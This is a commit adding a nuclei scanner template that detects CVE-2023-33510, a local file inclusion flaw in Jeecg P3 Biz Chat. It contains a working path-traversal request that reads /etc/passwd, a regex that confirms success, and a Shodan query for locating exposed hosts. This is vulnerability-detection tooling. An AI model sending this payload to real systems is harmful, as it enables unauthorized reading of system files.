Merge pull request #7483 from projectdiscovery/CVE-2023-33510

Create CVE-2023-33510.yaml
2023-06-22 12:30:07 +05:30 · 2023-06-22 12:30:07 +05:30 · 3d55f1fb1a
parent 0a8e14131c 7efd5ad08d
commit 3d55f1fb1a
1 changed files with 38 additions and 0 deletions
--- a/http/cves/2023/CVE-2023-33510.yaml
+++ b/http/cves/2023/CVE-2023-33510.yaml
@ -0,0 +1,38 @@
+id: CVE-2023-33510
+
+info:
+  name: Jeecg P3 Biz Chat - Local File Inclusion
+  author: DhiyaneshDK
+  severity: high
+  description: |
+    Jeecg P3 Biz Chat 1.0.5 allows remote attackers to read arbitrary files through specific parameters.
+  reference:
+    - https://twitter.com/momika233/status/1670701256535572481
+    - https://carl1l.github.io/2023/05/08/jeecg-p3-biz-chat-1-0-5-jar-has-arbitrary-file-read-vulnerability/
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33510
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2023-33510
+    cwe-id: CWE-668
+  metadata:
+    max-request: 1
+    verified: "true"
+    shodan-query: http.favicon.hash:1380908726
+  tags: cve,cve2023,jeecg,lfi
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/chat/imController/showOrDownByurl.do?dbPath=../../../../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200